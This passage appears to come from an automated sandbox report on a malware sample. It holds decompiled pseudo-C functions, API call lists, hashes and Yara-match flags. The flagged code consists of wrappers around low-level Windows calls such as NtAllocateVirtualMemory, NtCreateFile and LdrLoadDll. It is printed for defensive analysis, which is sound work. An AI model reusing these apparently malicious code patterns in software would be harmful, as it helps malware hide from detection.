                                                				_v44 = _t177 % 0xa;
                                                				if(_v12 >= 0x14 || _v20 == 0) {
                                                					if(_v12 >= 0x14 || _v20 != 0) {
                                                						if(_v12 <= 0x14 || _v20 == 0) {
                                                							E01231E50(_t178, _v40,  &_v92);
                                                							E01231E40( &_v32, _v44,  &_v32);
                                                							E01238140( &_v64,  &_v32);
                                                							_t294 = _t294 + 8;
                                                						} else {
                                                							E01231E40(_v20, _v20,  &_v32);
                                                							E01238140( &_v64, "Hundred ");
                                                							E01231E50(_v40, _v40,  &_v92);
                                                							E01238140( &_v64,  &_v92);
                                                							E01231E40( &_v32, _v44,  &_v32);
                                                							E01238140( &_v64,  &_v32);
                                                							_t294 = _t294 + 0x18;
                                                						}
                                                					} else {
                                                						E01231E40( &_v32, _v12,  &_v32);
                                                					}
                                                				} else {
                                                					E01231E40(_v20, _v20,  &_v32);
                                                					E01238140( &_v64, "Hundred ");
                                                					E01231E40(_v12, _v12,  &_v32);
                                                					E01238140( &_v64,  &_v32);
                                                					_t294 = _t294 + 0x10;
                                                				}
                                                				_v8 = 4;
                                                				while(_v8 >= 0) {
                                                					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
                                                						asm("cdq");
                                                						E01231E50( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
                                                						asm("cdq");
                                                						E01231E40( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
                                                						E01238140(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
                                                						_t294 = _t294 + 8;
                                                					} else {
                                                						E01231E40( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
                                                					}
                                                					_v8 = _v8 - 1;
                                                				}
                                                				_v8 = 0;
                                                				while(_v8 < 5) {
                                                					_t189 = E012382C0(_t292 + _v8 * 0x1e - 0x13c);
                                                					_t294 = _t294 + 4;
                                                					_v68 = _t189;
                                                					if(_v68 != 0) {
                                                						E01238140( &_v168, _t292 + _v8 * 0x1e - 0x13c);
                                                						E01238140( &_v168,  &_v80);
                                                						_t294 = _t294 + 0x10;
                                                					}
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E01238140(_a12,  &_v64);
                                                				_t186 = E012382C0(_a12);
                                                				 *((char*)(_a12 + _t186 - 1)) = 0;
                                                				return _t186;
                                                			}


































                                                0x01231b39
                                                0x01231b3f
                                                0x01231b42
                                                0x01231b45
                                                0x01231b48
                                                0x01231b4b
                                                0x01231b4f
                                                0x01231b52
                                                0x01231b58
                                                0x01231b5b
                                                0x01231b5e
                                                0x01231b61
                                                0x01231b73
                                                0x01231b78
                                                0x01231b7b
                                                0x01231b80
                                                0x01231b86
                                                0x01231b96
                                                0x01231b9d
                                                0x01231ba5
                                                0x01231ba8
                                                0x01231bba
                                                0x01231bc3
                                                0x01231bce
                                                0x01231bd5
                                                0x01231bdd
                                                0x01231bb7
                                                0x01231bb7
                                                0x01231bee
                                                0x01231bf4
                                                0x01231bfc
                                                0x01231c02
                                                0x01231c0a
                                                0x01231c10
                                                0x01231c18
                                                0x01231c1b
                                                0x01231c1e
                                                0x01231c24
                                                0x01231c26
                                                0x01231c2d
                                                0x01231c79
                                                0x01231c97
                                                0x01231d01
                                                0x01231d0e
                                                0x01231d1b
                                                0x01231d20
                                                0x01231c9f
                                                0x01231ca7
                                                0x01231cb5
                                                0x01231cc5
                                                0x01231cd2
                                                0x01231ce2
                                                0x01231cef
                                                0x01231cf4
                                                0x01231cf4
                                                0x01231c81
                                                0x01231c89
                                                0x01231c89
                                                0x01231c35
                                                0x01231c3d
                                                0x01231c4b
                                                0x01231c5b
                                                0x01231c68
                                                0x01231c6d
                                                0x01231c6d
                                                0x01231d23
                                                0x01231d35
                                                0x01231d43
                                                0x01231d63
                                                0x01231d6c
                                                0x01231d7c
                                                0x01231d85
                                                0x01231d9c
                                                0x01231da1
                                                0x01231d45
                                                0x01231d51
                                                0x01231d51
                                                0x01231d32
                                                0x01231d32
                                                0x01231da6
                                                0x01231db8
                                                0x01231dcc
                                                0x01231dd1
                                                0x01231dd4
                                                0x01231ddb
                                                0x01231df2
                                                0x01231e05
                                                0x01231e0a
                                                0x01231e0a
                                                0x01231db5
                                                0x01231db5
                                                0x01231e17
                                                0x01231e23
                                                0x01231e2e
                                                0x01231e36

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _memset
                                                • String ID: Hundred $Hundred
                                                • API String ID: 2102423945-1478457770
                                                • Opcode ID: fcdceea0351b5c3b9327cc6a9b04200c4f58c3b79de828819dc5718090bed5b8
                                                • Instruction ID: bf70320638243ae354252fbc0b49d0d291aebe6d83daf9c5f2d28ace7bd73fee
                                                • Opcode Fuzzy Hash: fcdceea0351b5c3b9327cc6a9b04200c4f58c3b79de828819dc5718090bed5b8
                                                • Instruction Fuzzy Hash: CBA162F1E10209EFCF08DFE8D881BEDB7B6AF98300F108569E515A7240EB759A15CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0123F71C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                                				intOrPtr* _v20;
                                                				void* _t4;
                                                				intOrPtr* _t7;
                                                				intOrPtr _t9;
                                                
                                                				_t15 = __edx;
                                                				_t13 = __ebx;
                                                				_t4 = E01243C1F(0, 0x10000, 0x30000);
                                                				if(_t4 != 0) {
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					E01238B87(__ebx, __edx);
                                                					asm("int3");
                                                					_t7 =  *_v20;
                                                					__eflags =  *_t7 - 0xe06d7363;
                                                					if( *_t7 != 0xe06d7363) {
                                                						L9:
                                                						__eflags = 0;
                                                						return 0;
                                                					} else {
                                                						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
                                                						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
                                                							goto L9;
                                                						} else {
                                                							_t9 =  *((intOrPtr*)(_t7 + 0x14));
                                                							__eflags = _t9 - 0x19930520;
                                                							if(__eflags == 0) {
                                                								L10:
                                                								E0123C6A9(_t13, _t15, 0, __eflags);
                                                								asm("int3");
                                                								E0123C080(E0123F743);
                                                								__eflags = 0;
                                                								return 0;
                                                							} else {
                                                								__eflags = _t9 - 0x19930521;
                                                								if(__eflags == 0) {
                                                									goto L10;
                                                								} else {
                                                									__eflags = _t9 - 0x19930522;
                                                									if(__eflags == 0) {
                                                										goto L10;
                                                									} else {
                                                										__eflags = _t9 - 0x1994000;
                                                										if(__eflags == 0) {
                                                											goto L10;
                                                										} else {
                                                											goto L9;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t4;
                                                				}
                                                			}







                                                0x0123f71c
                                                0x0123f71c
                                                0x0123f72a
                                                0x0123f734
                                                0x0123f738
                                                0x0123f739
                                                0x0123f73a
                                                0x0123f73b
                                                0x0123f73c
                                                0x0123f73d
                                                0x0123f742
                                                0x0123f749
                                                0x0123f74b
                                                0x0123f751
                                                0x0123f778
                                                0x0123f778
                                                0x0123f77b
                                                0x0123f753
                                                0x0123f753
                                                0x0123f757
                                                0x00000000
                                                0x0123f759
                                                0x0123f759
                                                0x0123f75c
                                                0x0123f761
                                                0x0123f77e
                                                0x0123f77e
                                                0x0123f783
                                                0x0123f789
                                                0x0123f78f
                                                0x0123f791
                                                0x0123f763
                                                0x0123f763
                                                0x0123f768
                                                0x00000000
                                                0x0123f76a
                                                0x0123f76a
                                                0x0123f76f
                                                0x00000000
                                                0x0123f771
                                                0x0123f771
                                                0x0123f776
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123f776
                                                0x0123f76f
                                                0x0123f768
                                                0x0123f761
                                                0x0123f757
                                                0x0123f736
                                                0x0123f737
                                                0x0123f737

                                                APIs
                                                • __controlfp_s.LIBCMT ref: 0123F72A
                                                  • Part of subcall function 01243C1F: __control87.LIBCMT ref: 01243C43
                                                • __invoke_watson.LIBCMT ref: 0123F73D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __control87__controlfp_s__invoke_watson
                                                • String ID: csm
                                                • API String ID: 1371525046-1018135373
                                                • Opcode ID: fa131dffc4bd09db79010682cd5662efd73d2b4268884cf89ca45d25eb5babb5
                                                • Instruction ID: cac245fbcc987b2affc1d2901390355be7cad308c80296496929e8e2425ef860
                                                • Opcode Fuzzy Hash: fa131dffc4bd09db79010682cd5662efd73d2b4268884cf89ca45d25eb5babb5
                                                • Instruction Fuzzy Hash: 1DF024F19303071B8B2F996DBB44ABE378D9FE0111FA40512E708CE521DB10C681C0D7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                C-Code - Quality: 37%
                                                			E00419FDC(void* __eax, void* __ebx, void* __ecx, void* _a4, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
                                                
                                                				asm("outsd");
                                                				if (__ebx + 1 >= 0) goto L4;
                                                			}



                                                0x00419fdd
                                                0x00419fdf

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: 186d4900891e41f7d0a5b6e498487b00eac1fa0112921c4b2a47906599fd03e7
                                                • Instruction ID: 484b6426c2f396df637221c1b542eae7c99e1a8ad17ede016dac9c88e00d6fb1
                                                • Opcode Fuzzy Hash: 186d4900891e41f7d0a5b6e498487b00eac1fa0112921c4b2a47906599fd03e7
                                                • Instruction Fuzzy Hash: 180129B2200104AFCB14DF99DC95EEB77A9EF8C364F058659BA1D97241D630E9118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: e93340b54edd0e397a6388d217535b99c41eb399cd2601d53624c99cf8a53c24
                                                • Instruction ID: c27302ad052d1d1f2e6217c30eb68fe5cd20bea1afe8e39536764aa01b7a8a30
                                                • Opcode Fuzzy Hash: e93340b54edd0e397a6388d217535b99c41eb399cd2601d53624c99cf8a53c24
                                                • Instruction Fuzzy Hash: 40F098B2214109ABCB04DF99DC90EEB77ADAF8C314F158249FA1DA3241C634E8528BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 21%
                                                			E0041A08A(void* __eax, void* __eflags, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                                                				intOrPtr _v0;
                                                				long _t24;
                                                				void* _t43;
                                                				void* _t44;
                                                				intOrPtr* _t48;
                                                				void* _t50;
                                                
                                                				asm("pushad");
                                                				if(__eflags != 0) {
                                                					asm("out dx, eax");
                                                					_push(_t50);
                                                					_t20 = _v0;
                                                					_push(0xec8b5542);
                                                					_t12 = _t20 + 0xc60; // 0xca0
                                                					E0041AB30(_t43, _v0, _t12,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
                                                					_t24 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                					return _t24;
                                                				} else {
                                                					asm("int1");
                                                					asm("rcl byte [ebp-0x75], 1");
                                                					_t25 = _v0;
                                                					_t48 = _v0 + 0xc58;
                                                					E0041AB30(_t43, _v0, _t48,  *((intOrPtr*)(_t25 + 0x10)), 0, 0x2e);
                                                					return  *((intOrPtr*)( *_t48))(_a4, _a8, _a12, _a16, _a20, _a24, _t44, _t50);
                                                				}
                                                			}









                                                0x0041a08b
                                                0x0041a08c
                                                0x0041a10b
                                                0x0041a110
                                                0x0041a113
                                                0x0041a119
                                                0x0041a11f
                                                0x0041a127
                                                0x0041a149
                                                0x0041a14d
                                                0x0041a08e
                                                0x0041a08e
                                                0x0041a08f
                                                0x0041a093
                                                0x0041a09f
                                                0x0041a0a7
                                                0x0041a0cd
                                                0x0041a0cd

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e5f3e8fe15364777c768f6683378e5f3ff680987d6cdcc7d1dc2f38acf97667c
                                                • Instruction ID: 75a77298e69b931449c175a9d621f093196a4318d012a9f1617849d34b558838
                                                • Opcode Fuzzy Hash: e5f3e8fe15364777c768f6683378e5f3ff680987d6cdcc7d1dc2f38acf97667c
                                                • Instruction Fuzzy Hash: 0A113AB6200118BFDB14DF99CC81EEB77A9EF88354F158249FE09A7241C630E851CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 52%
                                                			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                				intOrPtr _v8;
                                                				struct _EXCEPTION_RECORD _v12;
                                                				struct _OBJDIR_INFORMATION _v16;
                                                				char _v536;
                                                				intOrPtr* _t14;
                                                				void* _t15;
                                                				struct _OBJDIR_INFORMATION _t17;
                                                				struct _OBJDIR_INFORMATION _t18;
                                                				void* _t30;
                                                				void* _t31;
                                                				void* _t32;
                                                
                                                				_push(_a8);
                                                				_t14 =  &_v536;
                                                				_push(0x104);
                                                				 *_t14 =  *_t14 + _t14;
                                                				_push( &_v12);
                                                				_v8 = _t14;
                                                				_t15 = E0041C820();
                                                				_t31 = _t30 + 0xc;
                                                				if(_t15 != 0) {
                                                					_t17 = E0041CC40(__eflags, _v8);
                                                					_t32 = _t31 + 4;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						E0041CEC0( &_v12, 0);
                                                						_t32 = _t32 + 8;
                                                					}
                                                					_t18 = E0041B070(_v8);
                                                					_v16 = _t18;
                                                					__eflags = _t18;
                                                					if(_t18 == 0) {
                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                						return _v16;
                                                					}
                                                					return _t18;
                                                				} else {
                                                					return _t15;
                                                				}
                                                			}














                                                0x0040acdc
                                                0x0040ace0
                                                0x0040ace6
                                                0x0040ace9
                                                0x0040aceb
                                                0x0040acec
                                                0x0040acef
                                                0x0040acf4
                                                0x0040acf9
                                                0x0040ad03
                                                0x0040ad08
                                                0x0040ad0b
                                                0x0040ad0d
                                                0x0040ad15
                                                0x0040ad1a
                                                0x0040ad1a
                                                0x0040ad21
                                                0x0040ad29
                                                0x0040ad2c
                                                0x0040ad2e
                                                0x0040ad42
                                                0x00000000
                                                0x0040ad44
                                                0x0040ad4a
                                                0x0040acfe
                                                0x0040acfe
                                                0x0040acfe

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                • Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
                                                • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                • Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419F30(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                				long _t21;
                                                				void* _t31;
                                                
                                                				_t3 = _a4 + 0xc40; // 0xc40
                                                				E0041AB30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                				return _t21;
                                                			}





                                                0x00419f3f
                                                0x00419f47
                                                0x00419f7d
                                                0x00419f81

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				long _t14;
                                                				void* _t21;
                                                
                                                				_t3 = _a4 + 0xc60; // 0xca0
                                                				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                				return _t14;
                                                			}





                                                0x0041a11f
                                                0x0041a127
                                                0x0041a149
                                                0x0041a14d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A060(intOrPtr _a4, void* _a8) {
                                                				long _t8;
                                                				void* _t11;
                                                
                                                				_t5 = _a4;
                                                				_t2 = _t5 + 0x10; // 0x300
                                                				_t3 = _t5 + 0xc50; // 0x40a923
                                                				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                				_t8 = NtClose(_a8); // executed
                                                				return _t8;
                                                			}





                                                0x0041a063
                                                0x0041a066
                                                0x0041a06f
                                                0x0041a077
                                                0x0041a085
                                                0x0041a089

                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b0e19c5a33abdfa14c6fd76f75a3e870d186fa73e58a9eaadeda597c4fa6c660
                                                • Instruction ID: ef78d97ac98f1ef10e9895a206e2bd1de81f4108d018eb57eebf770e457c2392
                                                • Opcode Fuzzy Hash: b0e19c5a33abdfa14c6fd76f75a3e870d186fa73e58a9eaadeda597c4fa6c660
                                                • Instruction Fuzzy Hash: 659002A174114442D600619D4554B064085E7F1341F51C015E1094554DD659CC527176
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9928e583927da5e03366de856a83385b340f52e9b72f337745bf4a831fce1289
                                                • Instruction ID: 6c11072116ca1418f853a2f4ec8c0b736a0ea5fac8247ff9d3a8ab2c6c7c2b0e
                                                • Opcode Fuzzy Hash: 9928e583927da5e03366de856a83385b340f52e9b72f337745bf4a831fce1289
                                                • Instruction Fuzzy Hash: 1B9002A1602140034605719D4554616808AA7F0241B51C021E1044590DD5658C917175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 89871b81ff7d88002e084408b85a3b82aa000f3477fa8500afb8fbbd3d5ff3ba
                                                • Instruction ID: dc01a49d538706d56be6144d03272f8bb254f589a867b336744d2ac0aaff87f6
                                                • Opcode Fuzzy Hash: 89871b81ff7d88002e084408b85a3b82aa000f3477fa8500afb8fbbd3d5ff3ba
                                                • Instruction Fuzzy Hash: 6D9002B160114402D640719D45447464085A7E0341F51C011A5094554ED6998DD576B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d8ff94095ed3cfdc3ce8ed037e6177af7fb9f6d97446419e8e7c57c3d4ac7584
                                                • Instruction ID: 0d41dbe9925a598ceedafa411440ecd60585b41f18daf2e0935f23313ea8555a
                                                • Opcode Fuzzy Hash: d8ff94095ed3cfdc3ce8ed037e6177af7fb9f6d97446419e8e7c57c3d4ac7584
                                                • Instruction Fuzzy Hash: 38900265611140030605A59D074450740C6A7E5391351C021F1045550CE6618C616171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5c4566f2db2e1b2e6a461a83d35a9cc01eb785bc9fcf8ed97e2ef2f11072b8db
                                                • Instruction ID: 6e852ebe7b51719e52b6086e67db39d0c9a425960b801342a373a927a7bea3d4
                                                • Opcode Fuzzy Hash: 5c4566f2db2e1b2e6a461a83d35a9cc01eb785bc9fcf8ed97e2ef2f11072b8db
                                                • Instruction Fuzzy Hash: 01900261A0114502D601719D4544616408AA7E0281F91C022A1054555EDA658D92B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b79a09c718711288d0106c8c00b724b78f968d64464fd5698dea3387040fe549
                                                • Instruction ID: 73af37a03fd765b09cd292ad07640e9523afe38014a1d57d59af8df71b3b6f9a
                                                • Opcode Fuzzy Hash: b79a09c718711288d0106c8c00b724b78f968d64464fd5698dea3387040fe549
                                                • Instruction Fuzzy Hash: D8900261642181525A45B19D45445078086B7F0281791C012A1444950CD5669C56E671
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: fc087445d65209b1f1b4b22c3f7c2874078a4ae1094368a480a1999557c43c5d
                                                • Instruction ID: b09871627db29b215026478fb43e3aa9a9df63df697d3599311503b7a19c09b1
                                                • Opcode Fuzzy Hash: fc087445d65209b1f1b4b22c3f7c2874078a4ae1094368a480a1999557c43c5d
                                                • Instruction Fuzzy Hash: A690027160114413D611619D46447074089A7E0281F91C412A0454558DE6968D52B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a40444cef5852e811aa0f6ac229fa410b9c20fdc8c2ac5f74e2d759254f968af
                                                • Instruction ID: 606c1b3005cfb314e4c687a6f10c1aebe48fac3c11681ac8242e92d92fa4c941
                                                • Opcode Fuzzy Hash: a40444cef5852e811aa0f6ac229fa410b9c20fdc8c2ac5f74e2d759254f968af
                                                • Instruction Fuzzy Hash: 7D90026961314002D680719D554860A4085A7E1242F91D415A0045558CD9558C696371
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 09d414a77421dbdd89e62810ac6d7e59c24b4fff9ae73138f52457d886109a6e
                                                • Instruction ID: 093dd93feac9e804fd1d6051a5affb3ea78cee6330f896c6d1106b7be87211cb
